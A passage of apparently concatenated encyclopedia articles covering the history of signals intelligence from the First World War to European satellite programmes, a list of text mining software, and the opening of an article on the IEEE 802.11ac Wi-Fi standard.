role in subsequent naval clashes, including at the Battle of Jutland as the British fleet was sent out to intercept them. The direction-finding capability allowed for the tracking and location of German ships, submarines and Zeppelins. Intercepts were also able to prove beyond doubt that the German high command had authorized the sinking of the Lusitania in May 1915, despite the vociferous German denials at the time. The system was so successful, that by the end of the war over 80 million words, comprising the totality of German wireless transmission over the course of the war had been intercepted by the operators of the Y-stations and decrypted. However its most astonishing success was in decrypting the Zimmermann Telegram, a telegram from the German Foreign Office sent via Washington to its ambassador Heinrich von Eckardt in Mexico. In the telegram's plaintext, Nigel de Grey and William Montgomery learned of the German Foreign Minister Arthur Zimmermann's offer to Mexico of United States' territories of Arizona, New Mexico, and Texas as an enticement to join the war as a German ally. The telegram was passed to the U.S. by Captain Hall, and a scheme was devised (involving a still unknown agent in Mexico and a burglary) to conceal how its plaintext had become available and also how the U.S. had gained possession of a copy. The telegram was made public by the United States, which declared war on Germany on 6 April 1917, entering the war on the Allied side. Interwar period With the importance of interception and decryption firmly established by the wartime experience, countries established permanent agencies dedicated to this task in the interwar period. These agencies carried out substantial SIGINT work between the World Wars, although the secrecy surrounding it was extreme. While the work carried out was primarily COMINT, ELINT also emerged, with the development of radar in the 1930s. United Kingdom In 1919, the British Cabinet's Secret Service Committee, chaired by Lord Curzon, recommended that a peace-time codebreaking agency should be created, a task given to the then-Director of Naval Intelligence, Hugh Sinclair. Sinclair merged staff from the British Army's MI1b and Royal Navy's Room 40 into the first peace-time codebreaking agency: the Government Code and Cypher School (GC&CS). The organization initially consisted of around 25–30 officers and a similar number of clerical staff. It was titled the "Government Code and Cypher School", a cover-name chosen by Victor Forbes of the Foreign Office. Alastair Denniston, who had been a leading member of Room 40, was appointed as its operational head. It was initially under the control of the Admiralty, and located in Watergate House, Adelphi, London. Its public function was "to advise as to the security of codes and cyphers used by all Government departments and to assist in their provision", but also had a secret directive to "study the methods of cypher communications used by foreign powers". GC&CS officially formed on 1 November 1919, and produced its first decrypt on 19 October. By 1922, the main focus of GC&CS was on diplomatic traffic, with "no service traffic ever worth circulating" and so, at the initiative of Lord Curzon, it was transferred from the Admiralty to the Foreign Office. GC&CS came under the supervision of Hugh Sinclair, who by 1923 was both the Chief of SIS and Director of GC&CS. In 1925, both organisations were co-located on different floors of Broadway Buildings, opposite St. James's Park. Messages decrypted by GC&CS were distributed in blue-jacketed files that became known as "BJs". In the 1920s, GC&CS was successfully reading Soviet Union diplomatic ciphers. However, in May 1927, during a row over clandestine Soviet support for the General Strike and the distribution of subversive propaganda, Prime Minister Stanley Baldwin made details from the decrypts public. By 1940, GC&CS was working on the diplomatic codes and ciphers of 26 countries, tackling over 150 diplomatic cryptosystems. Germany From the mid-twenties, German Military Intelligence Abwehr began intercepting and cryptanalyzing diplomatic traffic. Under Hermann Göring, the Nazi Research Bureau (Forschungsamt or "FA") had units for intercepting domestic and international communications. The FA was penetrated by a French spy in the 1930s, but the traffic grew to a point that it could not easily be forwarded. In addition to intercept stations in Germany, the FA established an intercept station in Berne, Switzerland. German code breaking penetrated most cryptosystems, other than the UK and US. German Condor Legion personnel in the Spanish Civil War ran COMINT against their opponents. United States The US Cipher Bureau was established in 1919 and achieved some success at the Washington Naval Conference in 1921, through cryptanalysis by Herbert Yardley. Secretary of War Henry L. Stimson closed the US Cipher Bureau in 1929 with the words "Gentlemen do not read each other's mail." Luckily for US COMINT, the Army offered a home to William Friedman after Stimson closed the Yardley operation. There, largely manual cylindrical and strip ciphers were developed, but, as a result of Friedman's advances in cryptanalysis, machine ciphers became a priority, such as the M134, also known as the SIGABA. While the SIGABA was a rotor machine like the German Enigma machine, it was never known to be cracked. It was replaced by electronic encryption devices. The American Sigint effort began in the early 1930s with mounting tensions with the Japanese. The Navy started implementing high frequency DF (HF/DF) at eleven planned locations, primarily on the Atlantic Coast. The first operational intercept came from what would later be called Station CAST, at Cavite in the Philippines. In July 1939, the function turned from training and R&D to operations, and the Navy officially established a Strategic Tracking Organization under a Direction Finder Policy. By December 1940, the Navy's communication organization, OP-20-G, had used HF/DF on German surface vessels and submarines. Training continued and cooperation with the British began. In April 1941, the British gave the US Navy a sample of their best HF/DF set from Marconi. World War II The use of SIGINT had even greater implications during World War II. The combined effort of intercepts and cryptanalysis for the whole of the British forces in World War II came under the code name "Ultra" managed from Government Code and Cypher School at Bletchley Park. By 1943, such was the extent of penetration of Axis communications and the speed and efficiency of distribution of the resulting intelligence, messages sometimes reached allied commanders in the field before their intended recipients. This advantage failed only when the German ground forces retreated within their own borders and they began using secure landline communications. For this reason, the Battle of the Bulge took the allies completely by surprise. A true world war, SIGINT still tended to be separate in the various theaters. Communications security, on the part of the Allies, was more centralized. From the Allied perspective, the critical theater-level perspectives were the Ultra SIGINT against the Germans in the European theater (including the Battle of the Atlantic, the Mediterranean Theater of Operations, and MAGIC against the Japanese in the Pacific Theater and the China-Burma-India theater. The entire German system of high command suffered from Hitler's deliberate fragmenting of authority, with Party, State, and military organizations competing for power. Hermann Göring also sought power for its own sake, but was much less effective as the war went on and he became more focused on personal status and pleasure. Germany enjoyed some SIGINT success against the Allies, especially with the Merchant Code and, early in the war, reading American attaché traffic. German air intelligence, during the Battle of Britain, suffered from the structural problem that subordinated intelligence to operations. Operations officers often made conclusions that best fit their plans, rather than fitting conclusions to information. In contrast, British air intelligence was systematic, from the highest-level, most sensitive Ultra to significant intelligence product from traffic analysis and cryptanalysis of low-level systems. Fortunately for the British, German aircraft communications discipline was poor, and the Germans rarely changed call signs, allowing the British to draw accurate inferences about the air order of battle. Japan was the least effective of the major powers in SIGINT. In addition to the official Allies and Axis battle of signals, there was a growing interest in Soviet espionage communications, which continued after the war. British SIGINT The British Government Code and Cypher School moved to Bletchley Park, in Milton Keynes, Buckinghamshire, at the beginning of the Second World War. A key advantage was Bletchley's geographical centrality. Commander Alastair Denniston was operational head of GC&CS. Key GC&CS cryptanalysts who moved from London to Bletchley Park included John Tiltman, Dillwyn "Dilly" Knox, Josh Cooper, and Nigel de Grey. These people had a variety of backgroundslinguists, chess champions, and crossword experts were common, and in Knox's case papyrology. In one 1941 recruiting stratagem The Daily Telegraph was asked to organise a crossword competition, after which promising contestants were discreetly approached about "a particular type of work as a contribution to the war effort". Denniston recognised, however, that the enemy's use of electromechanical cipher machines meant that formally trained mathematicians would be needed as well; Oxford's Peter Twinn joined GC&CS in February 1939; Cambridge's Alan Turing and Gordon Welchman began training in 1938 and reported to Bletchley the day after war was declared, along with John Jeffreys. Later-recruited cryptanalysts included the mathematicians Derek Taunt, Jack Good, Bill Tutte, and Max Newman; historian Harry Hinsley, and chess champions Hugh Alexander and Stuart Milner-Barry. Joan Clarke (eventually deputy head of Hut 8) was one of the few women employed at Bletchley as a full-fledged cryptanalyst. Properly used, the German Enigma and Lorenz ciphers should have been virtually unbreakable, but flaws in German cryptographic procedures, and poor discipline among the personnel carrying them out, created vulnerabilities which made Bletchley's attacks just barely feasible. These vulnerabilities, however, could have been remedied by relatively simple improvements in enemy procedures, and such changes would certainly have been implemented had Germany any hint of Bletchley's success. Thus the intelligence Bletchley produced was considered wartime Britain's "Ultra secret"higher even than the normally highest classification Most Secretand security was paramount. Initially, a wireless room was established at Bletchley Park. It was set up in the mansion's water tower under the code name "Station X", a term now sometimes applied to the codebreaking efforts at Bletchley as a whole. Due to the long radio aerials stretching from the wireless room, the radio station was moved from Bletchley Park to nearby Whaddon Hall to avoid drawing attention to the site. Subsequently, other listening stationsthe Y-stations, such as the ones at Chicksands in Bedfordshire, Beaumanor Hall, Leicestershire (where the headquarters of the War Office "Y" Group was located) and Beeston Hill Y Station in Norfolkgathered raw signals for processing at Bletchley. Coded messages were taken down by hand and sent to Bletchley on paper by motorcycle despatch riders or (later) by teleprinter. Bletchley's work was essential to defeating the U-boats in the Battle of the Atlantic, and to the British naval victories in the Battle of Cape Matapan and the Battle of North Cape. In 1941, Ultra exerted a powerful effect on the North African desert campaign against German forces under General Erwin Rommel. General Sir Claude Auchinleck wrote that were it not for Ultra, "Rommel would have certainly got through to Cairo". "Ultra" decrypts featured prominently in the story of Operation SALAM, László Almásy's daring mission across the Libyan Desert behind enemy lines in 1942. Prior to the Normandy landings on D-Day in June 1944, the Allies knew the locations of all but two of Germany's fifty-eight Western-front divisions. Winston Churchill was reported to have told King George VI: "It is thanks to the secret weapon of General Menzies, put into use on all the fronts, that we won the war!" Supreme Allied Commander, Dwight D. Eisenhower, at the end of the war, described Ultra as having been "decisive" to Allied victory. Official historian of British Intelligence in World War II Sir Harry Hinsley, argued that Ultra shortened the war "by not less than two years and probably by four years"; and that, in the absence of Ultra, it is uncertain how the war would have ended. German codes Most German messages decrypted at Bletchley were produced by one or another version of the Enigma cipher machine, but an important minority were produced by the even more complicated twelve-rotor Lorenz SZ42 on-line teleprinter cipher machine. Five weeks before the outbreak of war, in Warsaw, Poland's Cipher Bureau revealed its achievements in breaking Enigma to astonished French and British personnel. The British used the Poles' information and techniques, and the Enigma clone sent to them in August 1939, which greatly increased their (previously very limited) success in decrypting Enigma messages. The bombe was an electromechanical device whose function was to discover some of the daily settings of the Enigma machines on the various German military networks. Its pioneering design was developed by Alan Turing (with an important contribution from Gordon Welchman) and the machine was engineered by Harold 'Doc' Keen of the British Tabulating Machine Company. Each machine was about high and wide, deep and weighed about a ton. At its peak, GC&CS was reading approximately 4,000 messages per day. As a hedge against enemy attack most bombes were dispersed to installations at Adstock and Wavendon (both later supplanted by installations at Stanmore and Eastcote), and Gayhurst. Luftwaffe messages were the first to be read in quantity. The German navy had much tighter procedures, and the capture of code books was needed before they could be broken. When, in February 1942, the German navy introduced the four-rotor Enigma for communications with its Atlantic U-boats, this traffic became unreadable for a period of ten months. Britain produced modified bombes, but it was the success of the US Navy bombe that was the main source of reading messages from this version of Enigma for the rest of the war. Messages were sent to and fro across the Atlantic by enciphered teleprinter links. SIGINT played a most important role for the Royal Navy, in its protection of merchant ships during the Battle of the Atlantic. While Ultra cryptanalysis certainly played a role in dealing with German submarines, HF/DF and traffic analysis were complementary. It is unclear why the German submarine command believed that frequent radio communications were not a hazard to their boats, although they seemed confident in the security of their Enigma ciphers, both in the initial three-rotor and subsequent four-rotor versions (known as Triton to the Germans and Shark to the Allies). There was an apparent, mutually reinforcing belief that wolfpack attacks by groups of submarines were much more deadly than individual operations, and confidence the communications were secure. Arguably, the Germans underestimated HF/DF even more than they did British cryptanalysis. Apparently, the Germans did not realize that the Allies were not limited to slow, manually operated direction finders, and also underestimated the number of direction finders at sea. On the other hand, the introduction of a new secure communication system would have interrupted submarine operations for a long time since a gradual shift to a new system was out of the question. The Lorenz messages were codenamed Tunny at Bletchley Park. They were only sent in quantity from mid-1942. The Tunny networks were used for high-level messages between German High Command and field commanders. With the help of German operator errors, the cryptanalysts in the Testery (named after Ralph Tester, its head) worked out the logical structure of the machine despite not knowing its physical form. They devised automatic machinery to help with decryption, which culminated in Colossus, the world's first programmable digital electronic computer. This was designed and built by Tommy Flowers and his team at the Post Office Research Station at Dollis Hill. The first was delivered to Bletchley Park in December 1943 and commissioned the following February. Enhancements were developed for the Mark 2 Colossus, the first of which was working at Bletchley Park on the morning of D-day in June. Flowers then produced one Colossus a month for the rest of the war, making a total of ten with an eleventh part-built. The machines were operated mainly by Wrens in a section named the Newmanry after its head Max Newman. The "Radio Security Service" was established by MI8 in 1939 to control a network of Direction Finding and intercept stations to locate illicit transmissions coming from German spies in Britain. This service was soon intercepting a network of German Secret Service transmissions across Europe. Successful decryption was achieved at an early stage with the help of codes obtained from the British XX (Double Cross) System that "turned" German agents and used them to misdirect German intelligence. The combination of double agents and extensive penetration of German intelligence transmissions facilitated a series of highly successful strategic deception programmes throughout WWII. Italian codes Breakthroughs were also made with Italian signals. During the Spanish Civil War the Italian Navy used the K model of the commercial Enigma without a plugboard; this was solved by Knox in 1937. When Italy entered the war in 1940 an improved version of the machine was used, though little traffic was sent by it and there were "wholesale changes" in Italian codes and cyphers. Knox was given a new section for work on Enigma variations, which he staffed with women ("Dilly's girls") who included Margaret Rock, Jean Perrin, Clare Harding, Rachel Ronald, Elisabeth Granger; and Mavis Leverwho made the first break into the Italian naval traffic. She solved the signals revealing the Italian Navy's operational plans before the Battle of Cape Matapan in 1941, leading to a British victory. On entering World War II in June 1940, the Italians were using book codes for most of their military messages. The exception was the Italian Navy, which after the Battle of Cape Matapan started using the C-38 version of the Boris Hagelin rotor-based cipher machine, particularly to route their navy and merchant marine convoys to the conflict in North Africa. As a consequence, JRM Butler recruited his former student Bernard Willson to join a team with two others in Hut4. In June 1941, Willson became the first of the team to decode the Hagelin system, thus enabling military commanders to direct the Royal Navy and Royal Air Force to sink enemy ships carrying supplies from Europe to Rommel's Afrika Korps. This led to increased shipping losses and, from reading the intercepted traffic, the team learnt that between May and September 1941 the stock of fuel for the Luftwaffe in North Africa reduced by 90%. After an intensive language course, in March 1944 Willson switched to Japanese language-based codes. Japanese codes An outpost of the Government Code and Cypher School was set up in Hong Kong in 1935, the Far East Combined Bureau (FECB), to study Japanese signals. The FECB naval staff moved in 1940 to Singapore, then Colombo, Ceylon, then Kilindini, Mombasa, Kenya. They succeeded in deciphering Japanese codes with a mixture of skill and good fortune. The Army and Air Force staff went from Singapore to the Wireless Experimental Centre at Delhi, India. In early 1942, a six-month crash course in Japanese, for 20 undergraduates from Oxford and Cambridge, was started by the Inter-Services Special Intelligence School in Bedford, in a building across from the main Post Office. This course was repeated every six months until war's end. Most of those completing these courses worked on decoding Japanese naval messages in Hut 7, under John Tiltman. By mid-1945 well over 100 personnel were involved with this operation, which co-operated closely with the FECB and the US Signal intelligence Service at Arlington Hall, Virginia. Because of these joint efforts, by August of that year the Japanese merchant navy was suffering 90% losses at sea. In 1999, Michael Smith wrote that: "Only now are the British codebreakers (like John Tiltman, Hugh Foss, and Eric Nave) beginning to receive the recognition they deserve for breaking Japanese codes and cyphers". US SIGINT During the Second World War, the US Army and US Navy ran independent SIGINT organizations, with limited coordination, first on a pure personal basis, and then through committees. After the Normandy landings, Army SIGINT units accompanied major units, with traffic analysis as - or more - important than the tightly compartmented cryptanalytic information. General Bradley's Army Group, created on August 1, 1944, had SIGINT including access to Ultra. Patton's subordinate Third Army had a double-sized Signal Radio Intelligence Company attached to his headquarters, and two regular companies were assigned to the XV and VIII Corps. The US Navy used SIGINT in its anti-submarine warfare, using shore or ship-based SIGINT to vectored long-range patrol aircraft to U-boats. Allied cooperation in the Pacific Theater included the joint RAN/USN Fleet Radio Unit, Melbourne (FRUMEL), and the Central Bureau which was attached to the HQ of the Allied Commander of the South-West Pacific area. At first, Central Bureau was made up of 50% American, 25% Australian Army and 25% Royal Australian Air Force (RAAF) personnel, but additional Australian staff joined. In addition, RAAF operators, trained in Townsville, Queensland in intercepting Japanese telegraphic katakana were integrated into the new Central Bureau. Until Central Bureau received replacement data processing equipment for that which was lost in the Philippines, as of January 1942, U.S. Navy stations in Hawaii (Hypo), Corregidor (Cast) and OP-20-G (Washington) decrypted Japanese traffic well before the U.S. Army or Central Bureau in Australia. Cast, of course, closed with the evacuation of SIGINT personnel from the Philippines. Central Bureau broke into two significant Japanese Army cryptosystems in mid-1943. Japanese codes The US Army shared with the US Navy the Purple attack on Japanese diplomatic cryptosystems. After the creation of the Army Signal Security Agency, the cryptographic school at Vint Hill Farms Station, Warrenton, Virginia, trained analysts. As a real-world training exercise, the new analysts first solved the message center identifier system for the Japanese Army. Until Japanese Army cryptosystems were broken later in 1943, the order of battle and movement information on the Japanese came purely from direction finding and traffic analysis. Traffic analysts began tracking Japanese units in near real time. A critical result was the identification of the movement, by sea, of two Japanese infantry divisions from Shanghai to New Guinea. Their convoy was intercepted by US submarines, causing almost complete destruction of these units. Army units in the Pacific included the US 978th Signal Company based at the Allied Intelligence Bureau's secret "Camp X", near Beaudesert, Queensland south of Brisbane. This unit was a key part of operations behind Japanese lines, including communicating with guerillas and the Coastwatcher organization. It also sent radio operators to the guerillas, and then moved with the forces invading the Philippines. US Navy strategic stations targeted against Japanese sources at the outbreak of the war, included Station HYPO in Hawaii, Station CAST in the Philippines, station BAKER on Guam, and other locations including Puget Sound, and Bainbridge Island. US COMINT recognized the growing threat before the Pearl Harbor attack, but a series of errors, as well as priorities that were incorrect in hindsight, prevented any operational preparation against the attack. Nevertheless, that attack gave much higher priority to COMINT, both in Washington, D.C. and at the Pacific Fleet Headquarters in Honolulu. Organizational tuning corrected many prewar competitions between the Army and Navy. Perhaps most dramatically, intercepts of Japanese naval communications yielded information that gave Admiral Nimitz the upper hand in the ambush that resulted in the Japanese Navy's defeat at the Battle of Midway, six months after the Pearl Harbor attack. The US Army Air Force also had its own SIGINT capability. Soon after the Pearl Harbor attack, Lieutenant Howard Brown, of the 2nd Signal Service Company in Manila, ordered the unit to change its intercept targeting from Japanese diplomatic to air force communications. The unit soon was analyzing Japanese tactical networks and developing order of battle intelligence. They learned the Japanese air-to-ground network was Sama, Hainan Island, with one station in Indochina, one station near Hong Kong, and the other 12 unlocated. Two Japanese naval stations were in the Army net, and it handled both operations and ferrying of aircraft for staging new operations. Traffic analysis of still-encrypted traffic helped MacArthur predict Japanese moves as the Fil-American forces retreated in Bataan. An Australian-American intercept station was later built at Townsville, Queensland. US Air Force Far East, and its subordinate 5th Air Force, took control of the 126th in June 1943. The 126th was eventually placed under operational control of U.S. Air Force Far East in June 1943 to support 5th Air Force. Interception and traffic analysis from the company supported the attack into Dutch New Guinea in 1944. Cold War After the end of World War II, the Western allies began a rapid drawdown. At the end of WWII, the US still had a COMINT organization split between the Army and Navy. A 1946 plan listed Russia, China, and a [redacted] country as high-priority targets. From 1943 to 1980, the Venona project, principally a US activity with support from Australia and the UK, recovered information, some tantalizingly only in part, from Soviet espionage traffic. While the Soviets had originally used theoretically unbreakable one-time pads for the traffic, some of their operations violated communications security rules and reused some of the pads. This reuse caused the vulnerability that was exploited. Venona gave substantial information on the scope of Soviet espionage against the West, but critics claim some messages have been interpreted incorrectly, or are even false. Part of the problem is that certain persons, even in the encrypted traffic, were identified only by code names such as "Quantum". Quantum was a source on US nuclear weapons, and is often considered to be Julius Rosenberg. The name, however, could refer to any of a number of spies. US Tactical SIGINT After the Beirut deployment, Lieutenant General Alfred M. Gray, Jr. did an after-action review of the 2nd Radio Battalion detachment that went with that force. Part of the reason for this was that the irregular units that presented the greatest threat did not follow conventional military signal operating procedures, and used nonstandard frequencies and callsigns. Without NSA information on these groups, the detachment had to acquire this information from their own resources. Recognizing that national sources simply might not have information on a given environment, or that they might not make it available to warfighters, Lieutenant General Gray directed that a SIGINT function be created that could work with the elite Force Reconnaissance Marines who search out potential enemies. At first, neither the Force Reconnaissance nor Radio Battalion commanders thought this was viable, but had orders to follow. Initially, they attached a single Radio Battalion Marine, with an AN/GRR-8 intercept receiver, to a Force Reconnaissance team during an exercise. A respected Radio Marine, Corporal Kyle O'Malley was sent to the team, without any guidance for what he was to do. The exercise did not demonstrate that a one-man attachment, not Force Recon qualified, was useful. In 1984, Captain E.L. Gillespie, assigned to the Joint Special Operations Command, was alerted that he was to report to 2nd Radio Battalion, to develop a concept of operations for integrating SIGINT capabilities with Force Recon, using his joint service experience with special operations. Again, the immediate commanders were not enthusiastic. Nevertheless, a mission statement was drafted: "To conduct limited communications intelligence and specified electronic warfare operations in support of Force Reconnaissance operations during advance force or special operations missions." It was decided that a 6-man SIGINT team, with long/short range independent communications and SIGINT/EW equipment, was the minimum practical unit. It was not practical to attach this to the smallest 4-man Force Recon team. General Gray directed that the unit would be called a Radio Reconnaissance Team (RRT), and that adequate planning and preparation were done for the advance force operations part of the upcoming Exercise Solid Shield-85. Two six-man teams would be formed, from Marines assigned from the Radio Battalion, without great enthusiasm for the assignment. One Marine put it"There is nothing that the Marine Corps can do to me that I can't take." Force Recon required that the RRT candidates pass their selection course, and, to the surprise of Force Recon, they passed with honors. Both teams were assigned to the exercise, and the RRTs successfully maintained communications connectivity for Force Recon and SEALs, collected meaningful intelligence, disrupted opposing force communications, and were extracted without being compromised. From 1986 on, RRTs accompanied MEU (SOC) deployments. Their first combat role was in Operation Earnest Will, then Operation Praying Mantis, followed by participation in the 1989 United States invasion of Panama Recent history As evidenced by the Hainan Island incident, even while China and the US may cooperate on matters of mutual concern towards Russia, the Cold War has not completely disappeared. There was more regional cooperation, often driven by concerns about transnational terrorism. European countries also are finding that by sharing the cost, they can acquire SIGINT, IMINT, and MASINT capabilities independent of the US. In the US, both communications security and COMINT policies have been evolving, some with challenges. The adoption of a Belgian-developed encryption algorithm , approved in a public process, and accepted both for sensitive but unclassified traffic, as well as for classified information sent with NSA-generated and maintained keys, redraws the cryptologic environment as no longer NSA or not-NSA. Controversy continues on various types of COMINT justified as not requiring warrants, under the wartime authority of the President of the United States. Technologically, there was much greater use of UAVs as SIGINT collection platforms. Threat from terrorism Terrorism from foreign groups became an increasingly major concern, as with the 1992 al-Qaeda attack in Yemen, the 1993 truck bombing of the World Trade Center, the 1995 Khobar Towers bombing in Saudi Arabia and the 1998 bombings of the US embassies in Dar es Salaam, Tanzania and Nairobi, Kenya. Third world and non-national groups, with modern communications technology, in many ways are a harder SIGINT target than a nation that sends out large amounts of traffic. According to the retired Commandant of the US Marines, Alfred M. Gray, Jr., some of the significant concerns of these targets are: Inherently low probability of intercept/detection (LPI/LPD) because off-the-shelf radios can be frequency agile, spread spectrum, and transmit in bursts. Additional frequencies, not normally monitored, can be used. These include citizens band, marine (MF, HF, VHF) bands, personal radio services such as MURS, FRS/GMRS and higher frequencies for short-range communications Extensive use of telephones, almost always digital. Cellular and satellite telephones, while wireless, are challenging to intercept, as is Voice over IP (VoIP) Commercial strong encryption for voice and data "Extremely wide variety and complexity of potential targets, creating a "needle in the haystack" problem" As a result of the 9/11 attacks, intensification of US intelligence efforts, domestic and foreign, were to be expected. A key question, of course, was whether US intelligence could have prevented or mitigated the attacks, and how it might prevent future attacks. There is a continuing clash between advocates for civil liberties and those who assert that their loss is an agreeable exchange for enhanced safety. Under the George W. Bush administration, there was a large-scale and controversial capture and analysis of domestic and international telephone calls, claimed to be targeted against terrorism. It is generally accepted that warrants have not been obtained for this activity, sometimes called Room 641A after a location, in San Francisco, where AT&T provides NSA access. While very little is known about this system, it may be focused more on the signaling channel and Call detail records than the actual content of conversations. Another possibility is the use of software tools that do high-performance deep packet inspection. According to the marketing VP of Narus, "Narus has little control over how its products are used after they're sold. For example, although its lawful-intercept application has a sophisticated system for making sure the surveillance complies with the terms of a warrant, it's up to the operator whether to type those terms into the system... "That legal eavesdropping application was launched in February 2005, well after whistle-blower Klein allegedly learned that AT&T was installing Narus boxes in secure, NSA-controlled rooms in switching centers around the country. But that doesn't mean the government couldn't write its own code to do the dirty work. Narus even offers software-development kits to customers ". The same type of tools with legitimate ISP security applications also have COMINT interception and analysis capability. Former AT&T technician Mark Klein, who revealed AT&T was giving NSA access, said in a statement, said a Narus STA 6400 was in the NSA room to which AT&T allegedly copied traffic. The Narus device was "known to be used particularly by government intelligence agencies because of its ability to sift through large amounts of data looking for preprogrammed targets." European Space Systems cooperation French initiatives, along with French and Russian satellite launching, have led to cooperative continental European arrangements for intelligence sensors in space. In contrast, the UK has reinforced cooperation under the UKUSA agreement. France launched Helios 1A as a military photo-reconnaissance satellite on 7 July 1995. The Cerise (satellite) SIGINT technology demonstrator also was launched in 1995. A radio propagation experiment, S80-T, was launched in 1992, as a predecessor of the ELINT experiments. Clementine, the second-generation ELINT technology demonstrator, was launched in 1999. Financial pressures in 1994-1995 caused France to seek Spanish and Italian cooperation for Hélios 1B and German contributions to Helios 2. Helios 2A was launched on 18 December 2004. Built by EADS-Astrium for the French Space Agency (CNES), it was launched into a Sun-synchronous polar orbit at an altitude of about 680 kilometers. The same launcher carried French and Spanish scientific satellites and four Essaim ("Swarm") experimental ELINT satellites Germany launched their first reconnaissance satellite system, SAR-Lupe, on December 19, 2006. Further satellites were launched at roughly six-month intervals, and the entire system of this five-satellite synthetic aperture radar constellation achieved full operational readiness on 22 July 2008. SAR is usually considered a MASINT sensor, but the significance here is that Germany obtains access to French satellite ELINT. The joint French-Italian Orfeo Programme, a dual-use civilian and military satellite system, launched its first satellite on June 8, 2007. Italy is developing the Cosmo-Skymed X-band polarimetric SAR, to fly on two of the satellites. The other two will have complementary French electro-optical payloads. The second Orfeo is scheduled to launch in early 2008. While this is not an explicit SIGINT system, the French-Italian cooperation may suggest that Italy can get data from the French Essaim ELINT microsatellites. See also Signals intelligence by alliances, nations and industries References Bibliography Signals intelligence Military history by topic
41996200
https://en.wikipedia.org/wiki/List%20of%20text%20mining%20software
List of text mining software
Text mining computer programs are available from many commercial and open source companies and sources. Commercial Angoss – Angoss Text Analytics provides entity and theme extraction, topic categorization, sentiment analysis and document summarization capabilities via the embedded AUTINDEX – is a commercial text mining software package based on sophisticated linguistics by IAI (Institute for Applied Information Sciences), Saarbrücken. DigitalMR – social media listening & text+image analytics tool for market research FICO Score – leading provider of analytics. General Sentiment – Social Intelligence platform that uses natural language processing to discover affinities between the fans of brands with the fans of traditional television shows in social media. Stand alone text analytics to capture social knowledge base on billions of topics stored to 2004. IBM LanguageWare – the IBM suite for text analytics (tools and Runtime). IBM SPSS – provider of Modeler Premium (previously called IBM SPSS Modeler and IBM SPSS Text Analytics), which contains advanced NLP-based text analysis capabilities (multi-lingual sentiment, event and fact extraction), that can be used in conjunction with Predictive Modeling. Text Analytics for Surveys provides the ability to categorize survey responses using NLP-based capabilities for further analysis or reporting. Inxight – provider of text analytics, search, and unstructured visualization technologies. (Inxight was bought by Business Objects that was bought by SAP AG in 2008). Language Computer Corporation – text extraction and analysis tools, available in multiple languages. Lexalytics – provider of a text analytics engine used in Social Media Monitoring, Voice of Customer, Survey Analysis, and other applications. Salience Engine. The software provides the unique capability of merging the output of unstructured, text-based analysis with structured data to provide additional predictive variables for improved predictive models and association analysis. Linguamatics – provider of natural language processing (NLP) based enterprise text mining and text analytics software, I2E, for high-value knowledge discovery and decision support. Mathematica – provides built in tools for text alignment, pattern matching, clustering and semantic analysis. See Wolfram Language, the programming language of Mathematica. MATLAB offers Text Analytics Toolbox for importing text data, converting it to numeric form for use in machine and deep learning, sentiment analysis and classification tasks. Medallia – offers one system of record for survey, social, text, written and online feedback. NetOwl – suite of multilingual text and entity analytics products, including entity extraction, link and event extraction, sentiment analysis, geotagging, name translation, name matching, and identity resolution, among others. PolyAnalyst - text analytics environment. RapidMiner with its Text Processing Extension – data and text mining software. SAS – SAS Text Miner and Teragram; commercial text analytics, natural language processing, and taxonomy software used for Information Management. Sketch Engine – a corpus manager and analysis software which providing creating text corpora from uploaded texts or the Web including part-of-speech tagging and lemmatization or detecting a particular website. Sysomos – provider social media analytics software platform, including text analytics and sentiment analysis on online consumer conversations. WordStat – Content analysis and text mining add-on module of QDA Miner for analyzing large amounts of text data. Open source Carrot2 – text and search results clustering framework. GATE – general Architecture for Text Engineering, an open-source toolbox for natural language processing and language engineering. Gensim – large-scale topic modelling and extraction of semantic information from unstructured text (Python). Natural Language Toolkit (NLTK) – a suite of libraries and programs for symbolic and statistical natural language processing (NLP) for the Python programming language. OpenNLP – natural language processing. Orange with its text mining add-on. Stanbol – an open source text mining engine targeted at semantic content management. The programming language R provides a framework for text mining applications in the package tm. The Natural Language Processing task view contains tm and other text mining library packages. The KNIME Text Processing extension. The PLOS Text Mining Collection. Voyant Tools – a web-based text analysis environment, created as a scholarly project. spaCy – open-source Natural Language Processing library for Python KH Coder – for Quantitative Content Analysis or Text Mining References External links Text Mining APIs on Mashape Text Mining APIs on Programmable Web Text Mining APIs at the Text Analysis Portal for Research Data mining and machine learning software Lists of software
30802525
https://en.wikipedia.org/wiki/IEEE%20802.11ac-2013
IEEE 802.11ac-2013
IEEE 802.11ac-2013 or 802.11ac is a wireless networking standard in the IEEE 802.11 set of protocols (which is part of the Wi-Fi networking family), providing high-throughput wireless local area networks (WLANs) on the 5 GHz band. The standard has been retroactively labelled as Wi-Fi 5 by Wi-Fi Alliance. The specification has multi-station throughput of at least 1.1 gigabit per second (1.1 Gbit/s) and single-link throughput of at least 500 megabits per second (0.5 Gbit/s). This is accomplished by extending the air-interface concepts embraced by 802.11n: wider RF bandwidth (up to 160 MHz), more MIMO spatial streams (up to eight), downlink multi-user MIMO (up to four clients), and high-density modulation (up to 256-QAM). The Wi-Fi Alliance separated the introduction of ac wireless products into two phases ("waves"), named "Wave 1" and "Wave 2". From mid-2013, the alliance started certifying Wave 1 802.11ac products shipped by manufacturers, based on the IEEE 802.11ac Draft 3.0 (the IEEE standard was not finalized until later that year). Subsequently in 2016, Wi-Fi Alliance introduced the Wave 2 certification, which includes additional features like MU-MIMO (down-link only), 160 MHz channel width support, support for more 5 GHz channels, and four spatial streams (with four antennas; compared to three in Wave 1 and 802.11n, and eight in IEEE's 802.11ax specification). It meant Wave 2 products would have higher bandwidth and capacity than Wave 1 products. New technologies New technologies introduced with 802.11ac include the following: Extended channel binding Optional 160 MHz and mandatory 80 MHz channel bandwidth for stations; cf. 40 MHz maximum in 802.11n. More MIMO spatial streams Support for up to eight spatial streams (vs. four in 802.11n) Downlink multi-user MIMO (MU-MIMO, allows up to four simultaneous downlink MU-MIMO clients) Multiple STAs, each with one or more antennas, transmit or receive independent data streams simultaneously. Space-division multiple access (SDMA): streams not separated by frequency, but instead resolved spatially, analogous to 11n-style MIMO. Downlink MU-MIMO (one transmitting device, multiple receiving devices) included as an optional mode. Modulation 256-QAM, rate 3/4 and 5/6, added as optional modes (vs. 64-QAM, rate 5/6 maximum in 802.11n). Some vendors offer a non-standard 1024-QAM mode, providing 25% higher data rate compared to 256-QAM Other elements/features Beamforming with standardized sounding and feedback for compatibility between vendors (non-standard in 802.11n made it hard for beamforming to work effectively between different vendor products) MAC modifications (mostly to support above changes) Coexistence mechanisms for 20, 40, 80, and 160 MHz channels, 